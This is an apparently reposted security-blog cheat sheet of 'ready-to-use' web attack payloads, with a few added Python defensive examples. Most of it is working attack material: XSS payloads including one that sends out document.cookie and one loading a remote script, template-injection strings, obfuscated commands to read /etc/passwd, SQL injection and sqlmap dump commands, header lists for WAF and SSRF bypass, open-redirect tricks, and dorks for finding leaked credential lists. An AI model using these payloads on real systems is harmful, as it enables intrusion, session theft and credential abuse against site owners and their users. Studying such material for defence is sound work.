[Bookmark] Ready-to-use Payloads

admin · 2024-02-21 23:40:58

Disclaimer: the programs (methods) mentioned in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the author bears no legal or joint liability whatsoever.

New blog domain: https://gugesay.com


Payload dictionaries:

https://github.com/swisskyrepo/PayloadsAllTheThings
https://github.com/cujanovic/Markdown-XSS-Payloads
https://github.com/pwntester/ysoserial.net
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks (API keys)
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/AWS%20Amazon%20Bucket%20S3 (AWS buckets)
http://www.xss-payloads.com

Payload 'Secret Techniques'

Bypasses using UTF-8

<    = %C0%BC = %E0%80%BC = %F0%80%80%BC
>    = %C0%BE = %E0%80%BE = %F0%80%80%BE
'    = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
"    = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
"    = %CA%BA
'    = %CA%B9
Null = %00
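As an added example (not from the original post), the Python below shows why the overlong forms in this table matter: a decoder that skips the shortest-form check turns %C0%BC, %E0%80%BC and %F0%80%80%BC into '<' after any filter on the raw input has already run, while Python's strict codec rejects all three. The %CA%BA and %CA%B9 entries are a different case: they are valid look-alike characters, so strict decoding alone does not catch them.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample: the three overlong encodings of '<' from the table above.
OVERLONG_LT = ["%C0%BC", "%E0%80%BC", "%F0%80%80%BC"]


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 the way a buggy decoder does: trust the lead byte's length
    and never check that the sequence is the shortest possible encoding."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            length, cp = 1, b
        elif b >> 5 == 0b110:
            length, cp = 2, b & 0x1F
        elif b >> 4 == 0b1110:
            length, cp = 3, b & 0x0F
        elif b >> 3 == 0b11110:
            length, cp = 4, b & 0x07
        else:
            raise ValueError("invalid lead byte")
        for cont in data[i + 1:i + length]:
            if cont >> 6 != 0b10:
                raise ValueError("bad continuation byte")
            cp = (cp << 6) | (cont & 0x3F)
        out.append(chr(cp))  # 0xC0 0xBC -> U+003C '<': an overlong form slips through
        i += length
    return "".join(out)


def lenient_percent_decode(value: str) -> str:
    """Percent-decode, then run the lenient decoder (the vulnerable path)."""
    return lenient_utf8_decode(unquote_to_bytes(value))


def strict_percent_decode(value: str) -> str:
    """Percent-decode to raw bytes, then decode as strict UTF-8, which raises
    UnicodeDecodeError on every overlong form instead of yielding '<'."""
    return unquote_to_bytes(value).decode("utf-8")


def strict_rejects(value: str) -> bool:
    """True when the strict path refuses the input (what a validator should do)."""
    try:
        strict_percent_decode(value)
    except UnicodeDecodeError:
        return True
    return False
```

Validate after decoding, with a strict decoder; the look-alike characters need normalisation or an allow-list on top.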

XSS 'Ideas'

# Basics and first choices:
<script>alert(1)</script>
<script>alert(1)//
<script src="http://xss.rocks/xss.js"></script>
<img src/onerror=alert(1)>
<a href="javascript:alert(1)"></a>

# XSS strategy (polyglot):
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

# Akamai WAF bypass:
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>

# Injecting XSS or other HTML tags to build a new login page:
https://saajanbhujel.medium.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37

# XSS used to perform SSRF:
<script>window.location="http://endereço.."</script>

# Others:
<IMG SRC=javascript:alert('XSS')>

# jQuery version:
alert(jQuery.fn.jquery);

Angular template injection

{{constructor.constructor('alert(1)')()}}
{{constructor.constructor('alert(/XSS Stored!/)')()}}
1023+1 or {{1023+1}}

Ruby template injection

<%= 7*7 %>

Reading /etc/passwd

cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
??n/??t$IFS/?tc/????wd
??n${PATH%%[a-z]*}??t$IFS${PATH%%[a-z]*}??c${PATH%%u*}?????d
../../../../../../../../../../../../etc/passwd

Explanation:
$'\x41' => 'A' (hex)
$'\U41' => 'A' (hex Unicode)
$'\101' => 'A' (octal)

SQL Injection 'Ideas'

1+OR/AND+1=1, sELeCt/*Test*/1 and so on.
/?id=1%27%20AND%20%271%27=LENGTH(%27;%27)%20--+
/?id=1%27%20AND%20%271%27=LENGTH(%27;;%27)%20--+
/?id=1%27%20AND%20%271%27=STRCMP(%22;%22,%20%22;%22);%20--+
/?id=1%27%20AND%20%271%27=STRCMP(%22;;%22,%20%22;%22);%20--+
/?id=1%27%20AND%20%271%27=(sELecT%20@LOL:=1)%20--+
/?id=1%27%20AND%20%271%27=(sELecT%20@LOL:=12)%20--+

# Blind SQL injection and bypass:
Tip: X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

# From SQL injection to RCE:
https://systemweakness.com/sql-injection-to-remote-command-execution-rce-dd9a75292d1d

RCE

https://www.revshells.com/

https://www.100security.com.br/reverse-shell

https://4bdoz.medium.com/rce-by-code-injection-perl-reverse-shell-a2e90181b10

Common SQLMap commands

https://github.com/sqlmapproject/sqlmap/wiki/Usage
sqlmap.py -u [URL]?[Param]=* dbms
sqlmap.py -u [URL]?[Param]=* dbms --cookie 'ASP.NET_SessionId=abc123'
sqlmap.py -u [URL]?[Param]=1 dbms --level=2,3,4,5
sqlmap.py -u [URL]?[Param]=1 --privileges
sqlmap.py -u [URL]?[Param]=1 --tables --fresh-queries
sqlmap.py -u [URL]?[Param]=1 --sql-shell
sqlmap.py -u [URL]?[Param]=1 -D [database_name] -T [table_name] --columns --fresh-queries
sqlmap.py -u [URL]?[Param]=1 -D [database_name] -T [table_name] -C email,nome,senha --dump --fresh-queries
sqlmap.py -u [URL]?[Param]=1 -D [database_name] -T [table_name] --dump --predict-output
# --batch:
sqlmap.py -m tempsqlmap_targets.txt dbms

Bypassing WAF controls via IP

X-Originating-IP: localhost
X-Forwarded-For: localhost
X-Remote-IP: localhost
X-Remote-Addr: localhost
X-Forwarded-Host: localhost
X-Client-IP: localhost
X-Host: localhost
True-Client-Ip: localhost

Forgot password: exploiting email header injection

email="[email protected]%0a%0dcc:[email protected]"

Open redirect / SSRF payload generator

https://tools.intigriti.io/redirector/

# Basic payloads:
https://google.com/redirect.php?redirect=https:/facebook.com
https://google.com/redirect.php?redirect=https://facebook.com
https://google.com/redirect.php?redirect=http://facebook.com
https://google.com/redirect.php?redirect=#facebook.com
https://google.com/redirect.php?redirect=#%[email protected]
https://google.com/redirect.php?redirect=/facebook.com

# URL encoding:
https://google.com/redirect.php?redirect=%2Ffacebook.com
https://google.com/redirect.php?redirect=%2F%2Ffacebook.com
https://google.com/redirect.php?redirect=https%3A%2F%2Ffacebook.com

# CRLF:
https://google.com/redirect.php?redirect=%0D%0A/facebook.com

# Whitelisted domain or keyword:
https://google.com/redirect.php?redirect=google.com.facebook.com
https://google.com/redirect.php?redirect=google.comfacebook.com

# "https:" bypass:
https://google.com/redirect.php?redirect=https:facebook.com

# "/" bypass:
https://google.com/redirect.php?redirect=//facebook.com/

# Parameter pollution:
https://google.com/redirect.php?redirect=?next=google.com&next=facebook.com

# @ bypass:
https://google.com/[email protected]

# // bypass:
https://google.com/redirect.php?redirect=//facebook.com
https://google.com/redirect.php?redirect=https://google.com/redirect.php?redirect=

# Right-to-left override trick:
https://google.com/redirect.php?redirect=%40%E2%80%[email protected]

# Null byte %00 to bypass blacklist filters:
https://google.com/redirect.php?redirect=facebook%00.com

# '%E3%80%82' or '。' bypass:
https://google.com/redirect.php?redirect=facebook%E3%80%82com
https://google.com/redirect.php?redirect=facebook。com
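Added example, not part of the original post: a redirect validator run against the redirect= values listed above, assuming the site's own host is google.com as in the list. It puts the naive check these payloads defeat next to a stricter one that only accepts a site-relative path or an https URL on an allowed host.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"google.com"}  # the site's own host, as used in the list above

# The redirect= values from the list above (non-ASCII and encoded ones included).
PAGE_PAYLOADS = [
    "https:/facebook.com", "https://facebook.com", "http://facebook.com",
    "#facebook.com", "%2F%2Ffacebook.com", "https%3A%2F%2Ffacebook.com",
    "%0D%0A/facebook.com", "google.com.facebook.com", "google.comfacebook.com",
    "https:facebook.com", "//facebook.com/", "?next=google.com&next=facebook.com",
    "facebook%00.com", "facebook%E3%80%82com", "facebook。com",
]


def naive_is_safe(target: str) -> bool:
    """The kind of check the payloads above are written to defeat."""
    return target.startswith("/") or "google.com" in target


def is_safe_redirect(target: str) -> bool:
    """Allow only a site-relative path or an https URL on an allowed host."""
    t = unquote(target)  # judge %2F%2F, %0D%0A, %00 and %E3%80%82 by what they become
    # Control characters (CRLF, NUL) and non-ASCII (ideographic full stop,
    # right-to-left marks) never belong in a redirect target.
    if not all(0x20 <= ord(c) <= 0x7E for c in t):
        return False
    if "\\" in t:  # browsers normalise '\' to '/', so '/\host' means '//host'
        return False
    if t.startswith("/") and not t.startswith("//"):
        return True  # a plain path stays on this site
    parts = urlsplit(t)
    # Require a literal 'https://' prefix: 'https:/host' and 'https:host' look
    # relative to urlsplit but browsers treat them as absolute URLs.
    if parts.scheme != "https" or not t.startswith("https://"):
        return False
    if "@" in parts.netloc:  # userinfo tricks such as 'good.com@evil.com'
        return False
    return parts.hostname in ALLOWED_HOSTS
```

The fragment-only target "#facebook.com" is rejected too; the validator is deliberately conservative rather than trying to reason about what a fragment could be.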

SSRF bypass list

PS: copy all of the headers below and paste them into the request

Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
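Added example (not from the original post) covering both the WAF-by-IP header list and the SSRF header list above: how an application should resolve the client address so that none of these client-controlled headers can make a request look like it came from localhost. The trusted proxy address 10.0.0.5 and the sample requests are constructed.

```python
import ipaddress

# Constructed sample: the reverse proxy that sits in front of the application.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

# Headers from the two lists above. Any of them can be set by the client, so
# none may influence a decision unless the TCP peer is a proxy we control.
SPOOFABLE_HEADERS = {
    "x-forwarded-for", "x-originating-ip", "x-remote-ip", "x-remote-addr",
    "x-client-ip", "x-real-ip", "true-client-ip", "x-forwarded-host",
    "x-host", "x-custom-ip-authorization", "x-original-url", "x-rewrite-url",
}


def client_ip(peer: str, headers: dict):
    """Address that access-control decisions should use.

    X-Forwarded-For is consulted only when the peer is a trusted proxy, and
    then only its last hop, the one that proxy itself appended; anything a
    client prepended earlier in the chain is ignored.
    """
    peer_ip = ipaddress.ip_address(peer)
    if peer_ip not in TRUSTED_PROXIES:
        return peer_ip  # direct connection: the headers are untrusted noise
    lower = {k.lower(): v for k, v in headers.items()}
    hops = [h.strip() for h in lower.get("x-forwarded-for", "").split(",")]
    hops = [h for h in hops if h]
    try:
        return ipaddress.ip_address(hops[-1]) if hops else peer_ip
    except ValueError:
        # 'localhost' or the SQL-injection-style value from the SQLi section
        # is not an address: fall back to the peer rather than trust it.
        return peer_ip


def is_internal_request(peer: str, headers: dict) -> bool:
    """Localhost-only features must key off the resolved address."""
    return client_ip(peer, headers).is_loopback


def drop_spoofable_headers(peer: str, headers: dict) -> dict:
    """Headers the application layer gets to see: the spoofable ones are
    removed unless they arrived through a trusted proxy."""
    if ipaddress.ip_address(peer) in TRUSTED_PROXIES:
        return dict(headers)
    return {k: v for k, v in headers.items() if k.lower() not in SPOOFABLE_HEADERS}
```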

Insecure deserialization

# Basic payloads:
https://github.com/pwntester/ysoserial.net

# JSON insecure deserialization:
https://medium.com/r3d-buck3t/insecure-deserialization-with-json-net-c70139af011a

# JSON payloads:
https://github.com/pwntester/ysoserial.net
https://medium.com/c-sharp-progarmming/stop-insecure-deserialization-with-c-6a488c95cf2f

Bypassing JWT authentication via JWT header injection

PHP notes

https://hackcommander.github.io/pentesting-article-1/#

# Exploring PHP switch (type juggling):
https://domdom.tistory.com/entry/HackTheBoo-Web-Juggling-Facts-Writeup%EB%AC%B8%EC%A0%9C%ED%92%80%EC%9D%B4?category=1004766

"body": "{\"type\":true}"

fetch("http://198.211.107.250:1337/api/getfacts", {
  "headers": {
    "content-type": "application/json"
  },
  "body": "{\"type\":1}",
  "method": "POST",
  "mode": "cors",
}).then((r) => r.text())
  .then((r) => console.log(r));

Dorks

https://www.exploit-db.com/google-hacking-database/
https://www.googleguide.com/advanced_operators_reference.html

# Find leaks directly on hosting sites:
intitle:( combolist | dehashed | stealer ) site:anonfiles.com

# Besides the popular AnonFiles, 'interesting' things can also turn up on:
> bayfiles.com
> dataism-x.com
> pastebin.com
> justpaste.it
> file.io
> filechan.org
> mega.com
> drive.google.com

intext:"usuario" | "senha" | "username" | "password" | "mysql"

Thanks for reading. If you found this useful, feel free to share it with more friends who would enjoy it~

==== End of article ====

Originally published on the WeChat public account 骨哥说事: [Bookmark] Ready-to-use Payloads

Please keep this link when reposting (CN-SEC: thanks to the original author for their work): [Bookmark] Ready-to-use Payloads http://cn-sec.com/archives/2507865.html
